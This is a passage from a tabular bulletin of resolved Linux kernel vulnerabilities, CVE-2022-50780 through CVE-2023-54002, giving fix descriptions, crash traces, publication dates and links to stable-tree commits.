kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 __kasan_kmalloc+0xa1/0xb0 __kmalloc+0x49/0xb0 ops_init+0xe7/0x410 setup_net+0x5aa/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 Freed by task 15855: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_save_free_info+0x2a/0x40 ____kasan_slab_free+0x155/0x1b0 slab_free_freelist_hook+0x11b/0x220 __kmem_cache_free+0xa4/0x360 ops_init+0xb9/0x410 setup_net+0x5aa/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50780 | https://git.kernel.org/stable/c/5a2ea549be94924364f6911227d99be86e8cf34a https://git.kernel.org/stable/c/97ad240fd9aa9214497d14af2b91608e20856cac https://git.kernel.org/stable/c/c3edc6e808209aa705185f732e682a370981ced1 https://git.kernel.org/stable/c/a1e18acb0246bfb001b08b8b1b830b5ec92a0f13 https://git.kernel.org/stable/c/4a4df5e78712de39d6f90d6a64b5eb48dca03bd5 https://git.kernel.org/stable/c/d266935ac43d57586e311a087510fe6a084af742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amdgpu/pm: prevent array underflow in vega20_odn_edit_dpm_table() In the PP_OD_EDIT_VDDC_CURVE case the "input_index" variable is capped at 2 but not checked for negative values so it results in an out of bounds read. This value comes from the user via sysfs. | 2025-12-24 | not yet calculated | CVE-2022-50781 | https://git.kernel.org/stable/c/4d3dc0de9c46d9f73be6bac026e40b893e37ea21 https://git.kernel.org/stable/c/85273b4a7076ed5328c8ace02234e4e7e10972d5 https://git.kernel.org/stable/c/f289a38df0da4cfe4b50d04b1b9c3bc646fecd57 https://git.kernel.org/stable/c/a03625ad11b50429930f4c491d6c97e70f2ba89a https://git.kernel.org/stable/c/8084bd0a64e278314b733993f388d83a86aa1183 https://git.kernel.org/stable/c/d27252b5706e51188aed7647126e44dcf9e940c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug_on in __es_tree_search caused by bad quota inode We got a issue as fllows: ================================================================== kernel BUG at fs/ext4/extents_status.c:202! invalid opcode: 0000 [#1] PREEMPT SMP CPU: 1 PID: 810 Comm: mount Not tainted 6.1.0-rc1-next-g9631525255e3 #352 RIP: 0010:__es_tree_search.isra.0+0xb8/0xe0 RSP: 0018:ffffc90001227900 EFLAGS: 00010202 RAX: 0000000000000000 RBX: 0000000077512a0f RCX: 0000000000000000 RDX: 0000000000000002 RSI: 0000000000002a10 RDI: ffff8881004cd0c8 RBP: ffff888177512ac8 R08: 47ffffffffffffff R09: 0000000000000001 R10: 0000000000000001 R11: 00000000000679af R12: 0000000000002a10 R13: ffff888177512d88 R14: 0000000077512a10 R15: 0000000000000000 FS: 00007f4bd76dbc40(0000)GS:ffff88842fd00000(0000)knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005653bf993cf8 CR3: 000000017bfdf000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ext4_es_cache_extent+0xe2/0x210 ext4_cache_extents+0xd2/0x110 ext4_find_extent+0x5d5/0x8c0 ext4_ext_map_blocks+0x9c/0x1d30 ext4_map_blocks+0x431/0xa50 ext4_getblk+0x82/0x340 ext4_bread+0x14/0x110 ext4_quota_read+0xf0/0x180 v2_read_header+0x24/0x90 v2_check_quota_file+0x2f/0xa0 dquot_load_quota_sb+0x26c/0x760 dquot_load_quota_inode+0xa5/0x190 ext4_enable_quotas+0x14c/0x300 __ext4_fill_super+0x31cc/0x32c0 ext4_fill_super+0x115/0x2d0 get_tree_bdev+0x1d2/0x360 ext4_get_tree+0x19/0x30 vfs_get_tree+0x26/0xe0 path_mount+0x81d/0xfc0 do_mount+0x8d/0xc0 __x64_sys_mount+0xc0/0x160 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> ================================================================== Above issue may happen as follows: ------------------------------------- ext4_fill_super ext4_orphan_cleanup ext4_enable_quotas ext4_quota_enable ext4_iget --> get error inode <5> ext4_ext_check_inode --> Wrong imode makes it escape inspection make_bad_inode(inode) --> EXT4_BOOT_LOADER_INO set imode dquot_load_quota_inode vfs_setup_quota_inode --> check pass dquot_load_quota_sb v2_check_quota_file v2_read_header ext4_quota_read ext4_bread ext4_getblk ext4_map_blocks ext4_ext_map_blocks ext4_find_extent ext4_cache_extents ext4_es_cache_extent __es_tree_search.isra.0 ext4_es_end --> Wrong extents trigger BUG_ON In the above issue, s_usr_quota_inum is set to 5, but inode<5> contains incorrect imode and disordered extents. Because 5 is EXT4_BOOT_LOADER_INO, the ext4_ext_check_inode check in the ext4_iget function can be bypassed, finally, the extents that are not checked trigger the BUG_ON in the __es_tree_search function. To solve this issue, check whether the inode is bad_inode in vfs_setup_quota_inode(). | 2025-12-24 | not yet calculated | CVE-2022-50782 | https://git.kernel.org/stable/c/fb1d3b4107b4837b4a0dbbf01954269bd6acfdc3 https://git.kernel.org/stable/c/1d5524832ff204b8a8cd54ae1628b2122f6e9a8d https://git.kernel.org/stable/c/98004f926d27eaccdd2d336b7916a42e07392da1 https://git.kernel.org/stable/c/0dcbf4dc3d54aab5990952cfd832042fb300dbe3 https://git.kernel.org/stable/c/794c9175db1f2e5d2a28c326f10bd024dbd944f8 https://git.kernel.org/stable/c/1daff79463d7d76096c84c57cddc30c5d4be2226 https://git.kernel.org/stable/c/d323877484765aaacbb2769b06e355c2041ed115 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: use proper req destructor for IPv6 Before, only the destructor from TCP request sock in IPv4 was called even if the subflow was IPv6. It is important to use the right destructor to avoid memory leaks with some advanced IPv6 features, e.g. when the request socks contain specific IPv6 options. | 2025-12-24 | not yet calculated | CVE-2022-50783 | https://git.kernel.org/stable/c/6eb02c596ec02e5897ae377e065cb7df55337a96 https://git.kernel.org/stable/c/bd5dc96fea4edd16d2e22f41b4dd50a4cfbeb919 https://git.kernel.org/stable/c/092953f3c4cd65f88b27b87a922f6c725f34ee04 https://git.kernel.org/stable/c/1922ea6b0ae2ea0c9a09be0eafafe1cd1069d259 https://git.kernel.org/stable/c/d3295fee3c756ece33ac0d935e172e68c0a4161b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix potential use-after-free bug when trimming caps When trimming the caps and just after the 'session->s_cap_lock' is released in ceph_iterate_session_caps() the cap maybe removed by another thread, and when using the stale cap memory in the callbacks it will trigger use-after-free crash. We need to check the existence of the cap just after the 'ci->i_ceph_lock' being acquired. And do nothing if it's already removed. | 2025-12-24 | not yet calculated | CVE-2023-53867 | https://git.kernel.org/stable/c/2b2515b8095cf2149bef44383a99d5b5677f1831 https://git.kernel.org/stable/c/448875a73e16ba7d81dec9274ce9d33a12d092fb https://git.kernel.org/stable/c/ae6e935618d99cdba11eab4714092e7e5f13cf7e https://git.kernel.org/stable/c/aaf67de78807c59c35bafb5003d4fb457c764800 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mips: bmips: BCM6358: disable RAC flush for TP1 RAC flush causes kernel panics on BCM6358 with EHCI/OHCI when booting from TP1: [ 3.881739] usb 1-1: new high-speed USB device number 2 using ehci-platform [ 3.895011] Reserved instruction in kernel code[#1]: [ 3.900113] CPU: 0 PID: 1 Comm: init Not tainted 5.10.16 #0 [ 3.905829] $ 0 : 00000000 10008700 00000000 77d94060 [ 3.911238] $ 4 : 7fd1f088 00000000 81431cac 81431ca0 [ 3.916641] $ 8 : 00000000 ffffefff 8075cd34 00000000 [ 3.922043] $12 : 806f8d40 f3e812b7 00000000 000d9aaa [ 3.927446] $16 : 7fd1f068 7fd1f080 7ff559b8 81428470 [ 3.932848] $20 : 00000000 00000000 55590000 77d70000 [ 3.938251] $24 : 00000018 00000010 [ 3.943655] $28 : 81430000 81431e60 81431f28 800157fc [ 3.949058] Hi : 00000000 [ 3.952013] Lo : 00000000 [ 3.955019] epc : 80015808 setup_sigcontext+0x54/0x24c [ 3.960464] ra : 800157fc setup_sigcontext+0x48/0x24c [ 3.965913] Status: 10008703 KERNEL EXL IE [ 3.970216] Cause : 00800028 (ExcCode 0a) [ 3.974340] PrId : 0002a010 (Broadcom BMIPS4350) [ 3.979170] Modules linked in: ohci_platform ohci_hcd fsl_mph_dr_of ehci_platform ehci_fsl ehci_hcd gpio_button_hotplug usbcore nls_base usb_common [ 3.992907] Process init (pid: 1, threadinfo=(ptrval), task=(ptrval), tls=77e22ec8) [ 4.000776] Stack : 81431ef4 7fd1f080 81431f28 81428470 7fd1f068 81431edc 7ff559b8 81428470 [ 4.009467] 81431f28 7fd1f080 55590000 77d70000 77d5498c 80015c70 806f0000 8063ae74 [ 4.018149] 08100002 81431f28 0000000a 08100002 81431f28 0000000a 77d6b418 00000003 [ 4.026831] ffffffff 80016414 80080734 81431ecc 81431ecc 00000001 00000000 04000000 [ 4.035512] 77d54874 00000000 00000000 00000000 00000000 00000012 00000002 00000000 [ 4.044196] ... [ 4.046706] Call Trace: [ 4.049238] [<80015808>] setup_sigcontext+0x54/0x24c [ 4.054356] [<80015c70>] setup_frame+0xdc/0x124 [ 4.059015] [<80016414>] do_notify_resume+0x1dc/0x288 [ 4.064207] [<80011b50>] work_notifysig+0x10/0x18 [ 4.069036] [ 4.070538] Code: 8fc300b4 00001025 26240008 <ac820000> ac830004 3c048063 0c0228aa 24846a00 26240010 [ 4.080686] [ 4.082517] ---[ end trace 22a8edb41f5f983b ]--- [ 4.087374] Kernel panic - not syncing: Fatal exception [ 4.092753] Rebooting in 1 seconds.. Because the bootloader (CFE) is not initializing the Read-ahead cache properly on the second thread (TP1). Since the RAC was not initialized properly, we should avoid flushing it at the risk of corrupting the instruction stream as seen in the trace above. | 2025-12-24 | not yet calculated | CVE-2023-53986 | https://git.kernel.org/stable/c/d65de5ee8b72868fbbbd39ca73017d0e526fa13a https://git.kernel.org/stable/c/47a449ec09b4479b89dcc6b27ec3829fc82ffafb https://git.kernel.org/stable/c/65b723644294f1d79770704162c0e8d1f700b6f1 https://git.kernel.org/stable/c/2cdbcff99f15db86a10672fb220379a1ae46ccae https://git.kernel.org/stable/c/288c96aa5b5526cd4a946e84ef85e165857693b5 https://git.kernel.org/stable/c/ab327f8acdf8d06601fbf058859a539a9422afff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ping: Fix potentail NULL deref for /proc/net/icmp. After commit dbca1596bbb0 ("ping: convert to RCU lookups, get rid of rwlock"), we use RCU for ping sockets, but we should use spinlock for /proc/net/icmp to avoid a potential NULL deref mentioned in the previous patch. Let's go back to using spinlock there. Note we can convert ping sockets to use hlist instead of hlist_nulls because we do not use SLAB_TYPESAFE_BY_RCU for ping sockets. | 2025-12-24 | not yet calculated | CVE-2023-53987 | https://git.kernel.org/stable/c/5a08a32e624908890aa0a2eb442bb6a7669891a8 https://git.kernel.org/stable/c/176cbb6da28f36506cc60a4bec4ab8df0c16713a https://git.kernel.org/stable/c/ab5fb73ffa01072b4d8031cc05801fa1cb653bee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds read in hdr_delete_de() Here is a BUG report from syzbot: BUG: KASAN: slab-out-of-bounds in hdr_delete_de+0xe0/0x150 fs/ntfs3/index.c:806 Read of size 16842960 at addr ffff888079cc0600 by task syz-executor934/3631 Call Trace: memmove+0x25/0x60 mm/kasan/shadow.c:54 hdr_delete_de+0xe0/0x150 fs/ntfs3/index.c:806 indx_delete_entry+0x74f/0x3670 fs/ntfs3/index.c:2193 ni_remove_name+0x27a/0x980 fs/ntfs3/frecord.c:2910 ntfs_unlink_inode+0x3d4/0x720 fs/ntfs3/inode.c:1712 ntfs_rename+0x41a/0xcb0 fs/ntfs3/namei.c:276 Before using the meta-data in struct INDEX_HDR, we need to check index header valid or not. Otherwise, the corruptedi (or malicious) fs image can cause out-of-bounds access which could make kernel panic. | 2025-12-24 | not yet calculated | CVE-2023-53988 | https://git.kernel.org/stable/c/c58ea97aa94f033ee64a8cb6587d84a9849b6216 https://git.kernel.org/stable/c/9163a5b4ed290da4a7d23fa92533e0e81fd0166e https://git.kernel.org/stable/c/114204d25e1dffdd3a0c1cfbba219afd344f4b4f https://git.kernel.org/stable/c/4a034ece7e2877673d9085d6e7ed45e6ee40b761 https://git.kernel.org/stable/c/ab84eee4c7ab929996602eda7832854c35a6dda2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mm: fix VA-range sanity check Both create_mapping_noalloc() and update_mapping_prot() sanity-check their 'virt' parameter, but the check itself doesn't make much sense. The condition used today appears to be a historical accident. The sanity-check condition: if ((virt >= PAGE_END) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } ... can only be true for the KASAN shadow region or the module region, and there's no reason to exclude these specifically for creating and updateing mappings. When arm64 support was first upstreamed in commit: c1cc1552616d0f35 ("arm64: MMU initialisation") ... the condition was: if (virt < VMALLOC_START) { [ ... warning here ... ] return; } At the time, VMALLOC_START was the lowest kernel address, and this was checking whether 'virt' would be translated via TTBR1. Subsequently in commit: 14c127c957c1c607 ("arm64: mm: Flip kernel VA space") ... the condition was changed to: if ((virt >= VA_START) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } This appear to have been a thinko. The commit moved the linear map to the bottom of the kernel address space, with VMALLOC_START being at the halfway point. The old condition would warn for changes to the linear map below this, and at the time VA_START was the end of the linear map. Subsequently we cleaned up the naming of VA_START in commit: 77ad4ce69321abbe ("arm64: memory: rename VA_START to PAGE_END") ... keeping the erroneous condition as: if ((virt >= PAGE_END) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } Correct the condition to check against the start of the TTBR1 address space, which is currently PAGE_OFFSET. This simplifies the logic, and more clearly matches the "outside kernel range" message in the warning. | 2025-12-24 | not yet calculated | CVE-2023-53989 | https://git.kernel.org/stable/c/9d8d3df71516ec3236d8d93ff029d251377ba4b1 https://git.kernel.org/stable/c/32020fc2a8373d3de35ae6d029d5969a42651e7a https://git.kernel.org/stable/c/621619f626cbe702ddbdc54117f3868b8ebd8129 https://git.kernel.org/stable/c/b03c7fcc5ed854d0e1b27e9abf12428bfa751a37 https://git.kernel.org/stable/c/ab9b4008092c86dc12497af155a0901cc1156999 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SMB3: Add missing locks to protect deferred close file list cifs_del_deferred_close function has a critical section which modifies the deferred close file list. We must acquire deferred_lock before calling cifs_del_deferred_close function. | 2025-12-24 | not yet calculated | CVE-2023-53990 | https://git.kernel.org/stable/c/0f87e18203bd30f71eb1a65259e28e291b6cc43a https://git.kernel.org/stable/c/3aa9d065b0685b4e6052f3f2a2462966fdc44fd2 https://git.kernel.org/stable/c/cb36365dac25d546ca4af0eb22acb43c9b4ddfdf https://git.kernel.org/stable/c/32a046ccaeea6c19965c04a4c521e703f6607924 https://git.kernel.org/stable/c/ab9ddc87a9055c4bebd6524d5d761d605d52e557 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Disallow unallocated resources to be returned In the event that the topology requests resources that have not been created by the system (because they are typically not represented in dpu_mdss_cfg ^1), the resource(s) in global_state (in this case DSC blocks, until their allocation/assignment is being sanity-checked in "drm/msm/dpu: Reject topologies for which no DSC blocks are available") remain NULL but will still be returned out of dpu_rm_get_assigned_resources, where the caller expects to get an array containing num_blks valid pointers (but instead gets these NULLs). To prevent this from happening, where null-pointer dereferences typically result in a hard-to-debug platform lockup, num_blks shouldn't increase past NULL blocks and will print an error and break instead. After all, max_blks represents the static size of the maximum number of blocks whereas the actual amount varies per platform. ^1: which can happen after a git rebase ended up moving additions to _dpu_cfg to a different struct which has the same patch context. Patchwork: https://patchwork.freedesktop.org/patch/517636/ | 2025-12-24 | not yet calculated | CVE-2023-53991 | https://git.kernel.org/stable/c/8dbd54d679e3ab37be43bc1ed9f463dbf83a2259 https://git.kernel.org/stable/c/bf661c5e3bc48973acb363c76e3db965d9ed26d0 https://git.kernel.org/stable/c/9e1e236acdc42b5c43ec8d7f03a39537e70cc309 https://git.kernel.org/stable/c/9fe3644c720ac87d150f0bba5a4ae86cae55afaf https://git.kernel.org/stable/c/abc40122d9a69f56c04efb5a7485795f5ac799d1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: ocb: don't leave if not joined If there's no OCB state, don't ask the driver/mac80211 to leave, since that's just confusing. Since set/clear the chandef state, that's a simple check. | 2025-12-24 | not yet calculated | CVE-2023-53992 | https://git.kernel.org/stable/c/d7b0fe3487d203c04ee1bda91a63bd4dd398c350 https://git.kernel.org/stable/c/94332210902967b7d63294b43428c8ed075b20e6 https://git.kernel.org/stable/c/abc76cf552e13cfa88a204b362a86b0e08e95228 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/DOE: Fix memory leak with CONFIG_DEBUG_OBJECTS=y After a pci_doe_task completes, its work_struct needs to be destroyed to avoid a memory leak with CONFIG_DEBUG_OBJECTS=y. | 2025-12-24 | not yet calculated | CVE-2023-53993 | https://git.kernel.org/stable/c/2a0e0f4773fe8032fb17e56f897bee32ce3cdc2b https://git.kernel.org/stable/c/95628b830952943631d3d74f73f431f501c5d6f5 https://git.kernel.org/stable/c/abf04be0e7071f2bcd39bf97ba407e7d4439785e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ionic: remove WARN_ON to prevent panic_on_warn Remove unnecessary early code development check and the WARN_ON that it uses. The irq alloc and free paths have long been cleaned up and this check shouldn't have stuck around so long. | 2025-12-24 | not yet calculated | CVE-2023-53994 | https://git.kernel.org/stable/c/4c7276a6daf7e13a6dd30b0347b3f2c7df4d40bb https://git.kernel.org/stable/c/f8cc4fd99a325505e15c3da95d6de266efd3d9b5 https://git.kernel.org/stable/c/1417dd787a5e55b410a00a28231b0dcb19172457 https://git.kernel.org/stable/c/dc470466753ad0dd3a8c48aaefa05a992c119b9c https://git.kernel.org/stable/c/daeaad114cb163ec51bcf14326cb7fe37d368459 https://git.kernel.org/stable/c/abfb2a58a5377ebab717d4362d6180f901b6e5c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv4: fix one memleak in __inet_del_ifa() I got the below warning when do fuzzing test: unregister_netdevice: waiting for bond0 to become free. Usage count = 2 It can be repoduced via: ip link add bond0 type bond sysctl -w net.ipv4.conf.bond0.promote_secondaries=1 ip addr add 4.117.174.103/0 scope 0x40 dev bond0 ip addr add 192.168.100.111/255.255.255.254 scope 0 dev bond0 ip addr add 0.0.0.4/0 scope 0x40 secondary dev bond0 ip addr del 4.117.174.103/0 scope 0x40 dev bond0 ip link delete bond0 type bond In this reproduction test case, an incorrect 'last_prim' is found in __inet_del_ifa(), as a result, the secondary address(0.0.0.4/0 scope 0x40) is lost. The memory of the secondary address is leaked and the reference of in_device and net_device is leaked. Fix this problem: Look for 'last_prim' starting at location of the deleted IP and inserting the promoted IP into the location of 'last_prim'. | 2025-12-24 | not yet calculated | CVE-2023-53995 | https://git.kernel.org/stable/c/5624f26a3574500ce23929cb2c9976a0dec9920a https://git.kernel.org/stable/c/7c8ddcdab1b900bed69cad6beef477fff116289e https://git.kernel.org/stable/c/2f1e86014d0cc084886c36a2d77bc620e2d42618 https://git.kernel.org/stable/c/980f8445479814509a3cd55a8eabaae1c9030a4c https://git.kernel.org/stable/c/42652af5360d30b43b06057c193739e7dfb18f42 https://git.kernel.org/stable/c/ac28b1ec6135649b5d78b028e47264cb3ebca5ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/sev: Make enc_dec_hypercall() accept a size instead of npages enc_dec_hypercall() accepted a page count instead of a size, which forced its callers to round up. As a result, non-page aligned vaddrs caused pages to be spuriously marked as decrypted via the encryption status hypercall, which in turn caused consistent corruption of pages during live migration. Live migration requires accurate encryption status information to avoid migrating pages from the wrong perspective. | 2025-12-24 | not yet calculated | CVE-2023-53996 | https://git.kernel.org/stable/c/ba50e7773a99a109a1ea6f753b766a080d3b21cc https://git.kernel.org/stable/c/6615212d8e131b45bd9705b0d69cc0d2f624666f https://git.kernel.org/stable/c/8ae7457e71a320867d868f2622d7c643596e4f43 https://git.kernel.org/stable/c/ac3f9c9f1b37edaa7d1a9b908bc79d843955a1a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: of: fix double-free on unregistration Since commit 3d439b1a2ad3 ("thermal/core: Alloc-copy-free the thermal zone parameters structure"), thermal_zone_device_register() allocates a copy of the tzp argument and frees it when unregistering, so thermal_of_zone_register() now ends up leaking its original tzp and double-freeing the tzp copy. Fix this by locating tzp on stack instead. | 2025-12-24 | not yet calculated | CVE-2023-53997 | https://git.kernel.org/stable/c/adce49089412a9ae28f5c666e0bb12fbcd86b3f7 https://git.kernel.org/stable/c/ac4436a5b20e0ef1f608a9ef46c08d5d142f8da6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: virtio - Fix race on data_avail and actual data The virtio rng device kicks off a new entropy request whenever the data available reaches zero. When a new request occurs at the end of a read operation, that is, when the result of that request is only needed by the next reader, then there is a race between the writing of the new data and the next reader. This is because there is no synchronisation whatsoever between the writer and the reader. Fix this by writing data_avail with smp_store_release and reading it with smp_load_acquire when we first enter read. The subsequent reads are safe because they're either protected by the first load acquire, or by the completion mechanism. Also remove the redundant zeroing of data_idx in random_recv_done (data_idx must already be zero at this point) and data_avail in request_entropy (ditto). | 2025-12-24 | not yet calculated | CVE-2023-53998 | https://git.kernel.org/stable/c/241ef15776a7c8505008db689175b320d345ecd3 https://git.kernel.org/stable/c/a43bcb0b661cbbf3ad797d2aee6b6fd06b8fc69d https://git.kernel.org/stable/c/77471e4912d3960dafe141e268c44be8024fe4dc https://git.kernel.org/stable/c/c76d991b6f01a5d931e7053a73bc9524975a5215 https://git.kernel.org/stable/c/22c30022cde6e2c88612b3a499223cfa912f1bc7 https://git.kernel.org/stable/c/318657b4c2077289659f1cd9e2a34f6a3b208e3e https://git.kernel.org/stable/c/2fc91f156b3f3446a1bce80cf4adedcbf41271c2 https://git.kernel.org/stable/c/ac52578d6e8d300dd50f790f29a24169b1edd26c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: TC, Fix internal port memory leak The flow rule can be splited, and the extra post_act rules are added to post_act table. It's possible to trigger memleak when the rule forwards packets from internal port and over tunnel, in the case that, for example, CT 'new' state offload is allowed. As int_port object is assigned to the flow attribute of post_act rule, and its refcnt is incremented by mlx5e_tc_int_port_get(), but mlx5e_tc_int_port_put() is not called, the refcnt is never decremented, then int_port is never freed. The kmemleak reports the following error: unreferenced object 0xffff888128204b80 (size 64): comm "handler20", pid 50121, jiffies 4296973009 (age 642.932s) hex dump (first 32 bytes): 01 00 00 00 19 00 00 00 03 f0 00 00 04 00 00 00 ................ 98 77 67 41 81 88 ff ff 98 77 67 41 81 88 ff ff .wgA.....wgA.... backtrace: [<00000000e992680d>] kmalloc_trace+0x27/0x120 [<000000009e945a98>] mlx5e_tc_int_port_get+0x3f3/0xe20 [mlx5_core] [<0000000035a537f0>] mlx5e_tc_add_fdb_flow+0x473/0xcf0 [mlx5_core] [<0000000070c2cec6>] __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core] [<000000005cc84048>] mlx5e_configure_flower+0xd40/0x4c40 [mlx5_core] [<000000004f8a2031>] mlx5e_rep_indr_offload.isra.0+0x10e/0x1c0 [mlx5_core] [<000000007df797dc>] mlx5e_rep_indr_setup_tc_cb+0x90/0x130 [mlx5_core] [<0000000016c15cc3>] tc_setup_cb_add+0x1cf/0x410 [<00000000a63305b4>] fl_hw_replace_filter+0x38f/0x670 [cls_flower] [<000000008bc9e77c>] fl_change+0x1fd5/0x4430 [cls_flower] [<00000000e7f766e4>] tc_new_tfilter+0x867/0x2010 [<00000000e101c0ef>] rtnetlink_rcv_msg+0x6fc/0x9f0 [<00000000e1111d44>] netlink_rcv_skb+0x12c/0x360 [<0000000082dd6c8b>] netlink_unicast+0x438/0x710 [<00000000fc568f70>] netlink_sendmsg+0x794/0xc50 [<0000000016e92590>] sock_sendmsg+0xc5/0x190 So fix this by moving int_port cleanup code to the flow attribute free helper, which is used by all the attribute free cases. | 2025-12-24 | not yet calculated | CVE-2023-53999 | https://git.kernel.org/stable/c/bc1918bac0f30e3f551ef5649b53062917db55fa https://git.kernel.org/stable/c/ac5da544a3c2047cbfd715acd9cec8380d7fe5c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix deadlock issue when externel_lb and reset are executed together When externel_lb and reset are executed together, a deadlock may occur: [ 3147.217009] INFO: task kworker/u321:0:7 blocked for more than 120 seconds. [ 3147.230483] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 3147.238999] task:kworker/u321:0 state:D stack: 0 pid: 7 ppid: 2 flags:0x00000008 [ 3147.248045] Workqueue: hclge hclge_service_task [hclge] [ 3147.253957] Call trace: [ 3147.257093] __switch_to+0x7c/0xbc [ 3147.261183] __schedule+0x338/0x6f0 [ 3147.265357] schedule+0x50/0xe0 [ 3147.269185] schedule_preempt_disabled+0x18/0x24 [ 3147.274488] __mutex_lock.constprop.0+0x1d4/0x5dc [ 3147.279880] __mutex_lock_slowpath+0x1c/0x30 [ 3147.284839] mutex_lock+0x50/0x60 [ 3147.288841] rtnl_lock+0x20/0x2c [ 3147.292759] hclge_reset_prepare+0x68/0x90 [hclge] [ 3147.298239] hclge_reset_subtask+0x88/0xe0 [hclge] [ 3147.303718] hclge_reset_service_task+0x84/0x120 [hclge] [ 3147.309718] hclge_service_task+0x2c/0x70 [hclge] [ 3147.315109] process_one_work+0x1d0/0x490 [ 3147.319805] worker_thread+0x158/0x3d0 [ 3147.324240] kthread+0x108/0x13c [ 3147.328154] ret_from_fork+0x10/0x18 In externel_lb process, the hns3 driver call napi_disable() first, then the reset happen, then the restore process of the externel_lb will fail, and will not call napi_enable(). When doing externel_lb again, napi_disable() will be double call, cause a deadlock of rtnl_lock(). This patch use the HNS3_NIC_STATE_DOWN state to protect the calling of napi_disable() and napi_enable() in externel_lb process, just as the usage in ndo_stop() and ndo_start(). | 2025-12-24 | not yet calculated | CVE-2023-54000 | https://git.kernel.org/stable/c/d9f609cb50ebab4aa6341112f406bf9d3928ac81 https://git.kernel.org/stable/c/743f7c1762e098048ede8cdf8c89a118f8d12391 https://git.kernel.org/stable/c/ef2d6bf9695669d31ece9f2ef39dec84874a87c7 https://git.kernel.org/stable/c/ac6257a3ae5db5193b1f19c268e4f72d274ddb88 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: r8712: Fix memory leak in _r8712_init_xmit_priv() In the above mentioned routine, memory is allocated in several places. If the first succeeds and a later one fails, the routine will leak memory. This patch fixes commit 2865d42c78a9 ("staging: r8712u: Add the new driver to the mainline kernel"). A potential memory leak in r8712_xmit_resource_alloc() is also addressed. | 2025-12-24 | not yet calculated | CVE-2023-54001 | https://git.kernel.org/stable/c/fc511ae405f7ba29fbcb0246061ec15c272386e1 https://git.kernel.org/stable/c/acacdbe0f740ca8c5d5da73d50870903a3ded677 https://git.kernel.org/stable/c/41e05572e871b10dbdc168c76175c97982daf4a4 https://git.kernel.org/stable/c/874555472c736813ba1f4baf0b4c09c8e26d81ea https://git.kernel.org/stable/c/ac83631230f77dda94154ed0ebfd368fc81c70a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix assertion of exclop condition when starting balance Balance as exclusive state is compatible with paused balance and device add, which makes some things more complicated. The assertion of valid states when starting from paused balance needs to take into account two more states, the combinations can be hit when there are several threads racing to start balance and device add. This won't typically happen when the commands are started from command line. Scenario 1: With exclusive_operation state == BTRFS_EXCLOP_NONE. Concurrently adding multiple devices to the same mount point and btrfs_exclop_finish executed finishes before assertion in btrfs_exclop_balance, exclusive_operation will changed to BTRFS_EXCLOP_NONE state which lead to assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE || fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD, in fs/btrfs/ioctl.c:456 Call Trace: <TASK> btrfs_exclop_balance+0x13c/0x310 ? memdup_user+0xab/0xc0 ? PTR_ERR+0x17/0x20 btrfs_ioctl_add_dev+0x2ee/0x320 btrfs_ioctl+0x9d5/0x10d0 ? btrfs_ioctl_encoded_write+0xb80/0xb80 __x64_sys_ioctl+0x197/0x210 do_syscall_64+0x3c/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Scenario 2: With exclusive_operation state == BTRFS_EXCLOP_BALANCE_PAUSED. Concurrently adding multiple devices to the same mount point and btrfs_exclop_balance executed finish before the latter thread execute assertion in btrfs_exclop_balance, exclusive_operation will changed to BTRFS_EXCLOP_BALANCE_PAUSED state which lead to assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE || fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD || fs_info->exclusive_operation == BTRFS_EXCLOP_NONE, fs/btrfs/ioctl.c:458 Call Trace: <TASK> btrfs_exclop_balance+0x240/0x410 